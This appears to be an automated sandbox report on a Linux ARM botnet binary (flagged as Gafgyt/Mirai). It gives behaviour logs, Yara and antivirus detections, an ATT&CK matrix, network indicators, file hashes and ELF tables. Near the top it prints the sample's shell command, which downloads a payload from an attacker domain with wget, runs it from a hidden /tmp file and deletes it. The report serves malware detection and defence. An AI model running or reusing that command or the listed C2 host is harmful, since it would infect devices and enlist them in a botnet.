            Source: /bin/sh (PID: 5525)Directory: /tmp/.....Jump to behavior
            Source: /usr/bin/wget (PID: 5523)Empty hidden file: /tmp/.....Jump to behavior
            Source: /tmp/armv4l.elf (PID: 5511)Shell command executed: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."Jump to behavior
            Source: /bin/sh (PID: 5524)Chmod executable: /usr/bin/chmod -> chmod 777 .....Jump to behavior
            Source: /bin/sh (PID: 5527)Rm executable: /usr/bin/rm -> rm -rf .....Jump to behavior
            Source: /bin/sh (PID: 5523)Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....Jump to behavior
            Source: /usr/bin/chmod (PID: 5524)File: /tmp/..... (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
            Source: /bin/sh (PID: 5524)Chmod executable with 777: /usr/bin/chmod -> chmod 777 .....Jump to behavior
            Source: /tmp/armv4l.elf (PID: 5509)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/wget (PID: 5523)Queries kernel information via 'uname': Jump to behavior
            Source: armv4l.elf, 5509.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp, armv4l.elf, 5513.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp, armv4l.elf, 5514.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/armv4l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/armv4l.elf
            Source: armv4l.elf, 5509.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp, armv4l.elf, 5513.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp, armv4l.elf, 5514.1.000055cb71b62000.000055cb71cb1000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
            Source: armv4l.elf, 5509.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp, armv4l.elf, 5513.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp, armv4l.elf, 5514.1.000055cb71b62000.000055cb71cb1000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: armv4l.elf, 5509.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp, armv4l.elf, 5513.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp, armv4l.elf, 5514.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: armv4l.elf, type: SAMPLE
            Source: Yara matchFile source: armv4l.elf, type: SAMPLE
            Source: Yara matchFile source: 5514.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5509.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5513.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: armv4l.elf PID: 5509, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: armv4l.elf PID: 5513, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: armv4l.elf PID: 5514, type: MEMORYSTR
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: Initial sampleUser agent string found: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
            Source: Initial sampleUser agent string found: Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: armv4l.elf, type: SAMPLE
            Source: Yara matchFile source: armv4l.elf, type: SAMPLE
            Source: Yara matchFile source: 5514.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5509.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5513.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: armv4l.elf PID: 5509, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: armv4l.elf PID: 5513, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: armv4l.elf PID: 5514, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            Path Interception1
            Hide Artifacts
            OS Credential Dumping11
            Security Software Discovery
            Remote ServicesData from Local System1
            Data Obfuscation
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
            File and Directory Permissions Modification
            LSASS Memory1
            File and Directory Discovery
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Hidden Files and Directories
            Security Account Manager1
            Remote System Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            File Deletion
            NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture11
            Application Layer Protocol
            Traffic DuplicationData Destruction
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1686584 Sample: armv4l.elf Startdate: 10/05/2025 Architecture: LINUX Score: 92 27 92.60.77.69, 40808, 40810, 40812 AS-IRIDEOS-KPIT Italy 2->27 29 gay.energy 2->29 31 daisy.ubuntu.com 2->31 33 Suricata IDS alerts for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 3 other signatures 2->39 8 armv4l.elf 2->8         started        signatures3 process4 signatures5 41 Opens /proc/net/* files useful for finding connected devices and routers 8->41 11 armv4l.elf sh 8->11         started        13 armv4l.elf 8->13         started        15 armv4l.elf 8->15         started        process6 process7 17 sh sh 11->17         started        19 sh wget 11->19         started        21 sh chmod 11->21         started        23 sh rm 11->23         started        25 armv4l.elf 13->25         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            armv4l.elf69%ReversingLabsLinux.Trojan.Gafgyt
            armv4l.elf63%VirustotalBrowse
            armv4l.elf100%AviraLINUX/Gafgyt.opnd
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            daisy.ubuntu.com
            162.213.35.24
            truefalse
              high
              gay.energy
              unknown
              unknowntrue
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                92.60.77.69
                unknownItaly5602AS-IRIDEOS-KPITtrue
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                92.60.77.69armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                  mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                    mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                      x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        daisy.ubuntu.commipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 162.213.35.25
                        mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 162.213.35.25
                        x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 162.213.35.25
                        arm5.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        arm6.elfGet hashmaliciousGafgytBrowse
                        • 162.213.35.24
                        rep.arc.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.24
                        arm6.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.25
                        Space.arm5.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.24
                        Space.spc.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.25
                        O4WmcV1laq.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        AS-IRIDEOS-KPITarmv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 92.60.77.69
                        mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 92.60.77.69
                        mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 92.60.77.69
                        x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 92.60.77.69
                        armv4l.elfGet hashmaliciousUnknownBrowse
                        • 193.28.95.59
                        nullnet_load.arm7.elfGet hashmaliciousMiraiBrowse
                        • 109.233.129.42
                        8427xbk3Zt.elfGet hashmaliciousUnknownBrowse
                        • 109.233.130.43
                        No context
                        No context
                        No created / dropped files found
                        File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, with debug_info, not stripped
                        Entropy (8bit):6.068772811501425
                        TrID:
                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                        File name:armv4l.elf
                        File size:143'416 bytes
                        MD5:2e540f8ae41ef4c6b81b7e3f76fb10a4
                        SHA1:63dbd55249baa1b541f72f3024b1e22d8e72d512
                        SHA256:8a31d94ac6c21de724e8fb226b77aeeabd2780298850dcadbc05724b643c4ad8
                        SHA512:2d66528f0186d8cc0d944e93f6a45ff18d6e26b8e5abd66565460d3784512d713354648e529ac7f4d8e9ff6cc04024e2a3dbf25116428343bb4d21c563a3b259
                        SSDEEP:3072:ez3t4CFcrw1vqzq21FOr/gzZluXUUt0gLS22hH2sCmnoQhJUx3Nu:J6HvSAkZluX5t0gLUQmnoQhJUx3Nu
                        TLSH:09E31830E454461BC2D223FAE79E825E3F321E9753A733115B387EB02FE27991E69524
                        File Content Preview:.ELF...a..........(.........4...<.......4. ...(.....................X...X...........................@....j..........Q.td..................................-...L."...LQ..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                        ELF header

                        Class:ELF32
                        Data:2's complement, little endian
                        Version:1 (current)
                        Machine:ARM
                        Version Number:0x1
                        Type:EXEC (Executable file)
                        OS/ABI:ARM - ABI
                        ABI Version:0
                        Entry Point Address:0x8190
                        Flags:0x202
                        ELF Header Size:52
                        Program Header Offset:52
                        Program Header Size:32
                        Number of Program Headers:3
                        Section Header Offset:111164
                        Section Header Size:40
                        Number of Section Headers:20
                        Header String Table Index:17
                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                        NULL0x00x00x00x00x0000
                        .initPROGBITS0x80940x940x180x00x6AX004
                        .textPROGBITS0x80b00xb00x145680x00x6AX0016
                        .finiPROGBITS0x1c6180x146180x140x00x6AX004
                        .rodataPROGBITS0x1c62c0x1462c0x452c0x00x2A004
                        .eh_framePROGBITS0x290000x190000x40x00x3WA004
                        .ctorsPROGBITS0x290040x190040x80x00x3WA004
                        .dtorsPROGBITS0x2900c0x1900c0x80x00x3WA004
                        .jcrPROGBITS0x290140x190140x40x00x3WA004
                        .dataPROGBITS0x290180x190180x3280x00x3WA004
                        .bssNOBITS0x293400x193400x67680x00x3WA004
                        .commentPROGBITS0x00x193400xcd00x00x0001
                        .debug_arangesPROGBITS0x00x1a0100x1200x00x0008
                        .debug_infoPROGBITS0x00x1a1300x6080x00x0001
                        .debug_abbrevPROGBITS0x00x1a7380xb40x00x0001
                        .debug_linePROGBITS0x00x1a7ec0x9050x00x0001
                        .debug_framePROGBITS0x00x1b0f40xa00x00x0004
                        .shstrtabSTRTAB0x00x1b1940xa80x00x0001
                        .symtabSYMTAB0x00x1b55c0x50400x100x0197024
                        .strtabSTRTAB0x00x2059c0x2a9c0x00x0001
                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                        LOAD0x00x80000x80000x18b580x18b586.18650x5R E0x8000.init .text .fini .rodata
                        LOAD0x190000x290000x290000x3400x6aa83.89430x6RW 0x8000.eh_frame .ctors .dtors .jcr .data .bss
                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                        NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                        .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                        .symtab0x80940SECTION<unknown>DEFAULT1
                        .symtab0x80b00SECTION<unknown>DEFAULT2
                        .symtab0x1c6180SECTION<unknown>DEFAULT3
                        .symtab0x1c62c0SECTION<unknown>DEFAULT4
                        .symtab0x290000SECTION<unknown>DEFAULT5
                        .symtab0x290040SECTION<unknown>DEFAULT6
                        .symtab0x2900c0SECTION<unknown>DEFAULT7
                        .symtab0x290140SECTION<unknown>DEFAULT8
                        .symtab0x290180SECTION<unknown>DEFAULT9
                        .symtab0x293400SECTION<unknown>DEFAULT10
                        .symtab0x00SECTION<unknown>DEFAULT11
                        .symtab0x00SECTION<unknown>DEFAULT12
                        .symtab0x00SECTION<unknown>DEFAULT13
                        .symtab0x00SECTION<unknown>DEFAULT14
                        .symtab0x00SECTION<unknown>DEFAULT15
                        .symtab0x00SECTION<unknown>DEFAULT16
                        .symtab0x00SECTION<unknown>DEFAULT17
                        .symtab0x00SECTION<unknown>DEFAULT18
                        .symtab0x00SECTION<unknown>DEFAULT19
                        $a.symtab0x80940NOTYPE<unknown>DEFAULT1
                        $a.symtab0x1c6180NOTYPE<unknown>DEFAULT3
                        $a.symtab0x80b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x81280NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1c6240NOTYPE<unknown>DEFAULT3
                        $a.symtab0x81880NOTYPE<unknown>DEFAULT2
                        $a.symtab0x80a00NOTYPE<unknown>DEFAULT1
                        $a.symtab0x1c5dc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1c6100NOTYPE<unknown>DEFAULT2
                        $a.symtab0x80a40NOTYPE<unknown>DEFAULT1
                        $a.symtab0x80a80NOTYPE<unknown>DEFAULT1
                        $a.symtab0x1c6280NOTYPE<unknown>DEFAULT3
                        $a.symtab0x81900NOTYPE<unknown>DEFAULT2
                        $a.symtab0x81cc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x86300NOTYPE<unknown>DEFAULT2
                        $a.symtab0x87780NOTYPE<unknown>DEFAULT2
                        $a.symtab0x884c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x89b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x8ae80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x93c80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x97980NOTYPE<unknown>DEFAULT2
                        $a.symtab0x991c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x9a6c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0xa02c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0xa4500NOTYPE<unknown>DEFAULT2
                        $a.symtab0xa4b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0xb6000NOTYPE<unknown>DEFAULT2
                        $a.symtab0xbd340NOTYPE<unknown>DEFAULT2
                        $a.symtab0xbe6c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0xc5880NOTYPE<unknown>DEFAULT2
                        $a.symtab0xcb700NOTYPE<unknown>DEFAULT2
                        $a.symtab0xdbc00NOTYPE<unknown>DEFAULT2
                        $a.symtab0xe8940NOTYPE<unknown>DEFAULT2
                        $a.symtab0xeb5c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0xf5080NOTYPE<unknown>DEFAULT2
                        $a.symtab0xf5900NOTYPE<unknown>DEFAULT2
                        $a.symtab0xf65c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0xf7e40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x102bc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x104ac0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x104f40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1053c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x105b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x106400NOTYPE<unknown>DEFAULT2
                        $a.symtab0x107d00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x115b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x116c00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1178c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x118700NOTYPE<unknown>DEFAULT2
                        $a.symtab0x118740NOTYPE<unknown>DEFAULT2
                        $a.symtab0x118c00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x118f00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1191c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x119240NOTYPE<unknown>DEFAULT2
                        $a.symtab0x119800NOTYPE<unknown>DEFAULT2
                        $a.symtab0x119ac0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x119b40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x119bc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x119ec0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x119f40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11a200NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11a280NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11a540NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11a840NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11ab00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11ad80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11b040NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11bcc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11bf80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11c480NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11c700NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11ca00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11ccc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11d000NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11d0c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11d3c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11d700NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11e240NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11ea00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11eb00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11f680NOTYPE<unknown>DEFAULT2
                        $a.symtab0x11f940NOTYPE<unknown>DEFAULT2
                        $a.symtab0x126c40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1275c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x127940NOTYPE<unknown>DEFAULT2
                        $a.symtab0x129300NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1297c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x12ebc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x12ef00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x12fa00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x130400NOTYPE<unknown>DEFAULT2
                        $a.symtab0x130a00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x130b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x130d00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x130e00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x130f00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x131e80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x132c00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x132e40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1339c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x134880NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1349c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x134a80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x135900NOTYPE<unknown>DEFAULT2
                        $a.symtab0x135b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x136280NOTYPE<unknown>DEFAULT2
                        $a.symtab0x136900NOTYPE<unknown>DEFAULT2
                        $a.symtab0x136b40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x136bc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1370c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x137380NOTYPE<unknown>DEFAULT2
                        $a.symtab0x137640NOTYPE<unknown>DEFAULT2
                        $a.symtab0x137940NOTYPE<unknown>DEFAULT2
                        $a.symtab0x137c00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x137f40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x138200NOTYPE<unknown>DEFAULT2
                        $a.symtab0x138540NOTYPE<unknown>DEFAULT2
                        $a.symtab0x138840NOTYPE<unknown>DEFAULT2
                        $a.symtab0x138b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x138e00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x138f40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x139980NOTYPE<unknown>DEFAULT2
                        $a.symtab0x13a040NOTYPE<unknown>DEFAULT2
                        $a.symtab0x142c00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x143cc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x147340NOTYPE<unknown>DEFAULT2
                        $a.symtab0x14b880NOTYPE<unknown>DEFAULT2
                        $a.symtab0x14bb00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x14cb00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x14cb40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x14d300NOTYPE<unknown>DEFAULT2
                        $a.symtab0x14dbc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x14e540NOTYPE<unknown>DEFAULT2
                        $a.symtab0x14ed00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x14f980NOTYPE<unknown>DEFAULT2
                        $a.symtab0x150240NOTYPE<unknown>DEFAULT2
                        $a.symtab0x151040NOTYPE<unknown>DEFAULT2
                        $a.symtab0x151cc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x151d80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x151e00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x153780NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1540c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x154b40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x155cc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x159a00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x15b8c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x15c200NOTYPE<unknown>DEFAULT2
                        $a.symtab0x15c6c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x15d100NOTYPE<unknown>DEFAULT2
                        $a.symtab0x15d480NOTYPE<unknown>DEFAULT2
                        $a.symtab0x15d940NOTYPE<unknown>DEFAULT2
                        $a.symtab0x160340NOTYPE<unknown>DEFAULT2
                        $a.symtab0x160940NOTYPE<unknown>DEFAULT2
                        $a.symtab0x160b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x161240NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1612c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x161580NOTYPE<unknown>DEFAULT2
                        $a.symtab0x161840NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1619c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x161a40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x161d00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x161fc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x162040NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1625c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x162640NOTYPE<unknown>DEFAULT2
                        $a.symtab0x162900NOTYPE<unknown>DEFAULT2
                        $a.symtab0x162bc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x162ec0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x162f40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x163200NOTYPE<unknown>DEFAULT2
                        $a.symtab0x163f40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x164b00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1654c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x165e00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x166b40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x166c00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x16a480NOTYPE<unknown>DEFAULT2
                        $a.symtab0x16a980NOTYPE<unknown>DEFAULT2
                        $a.symtab0x16ab80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x16b640NOTYPE<unknown>DEFAULT2
                        $a.symtab0x16cd40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x16ce00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x16d980NOTYPE<unknown>DEFAULT2
                        $a.symtab0x170840NOTYPE<unknown>DEFAULT2
                        $a.symtab0x171bc0NOTYPE<unknown>DEFAULT2
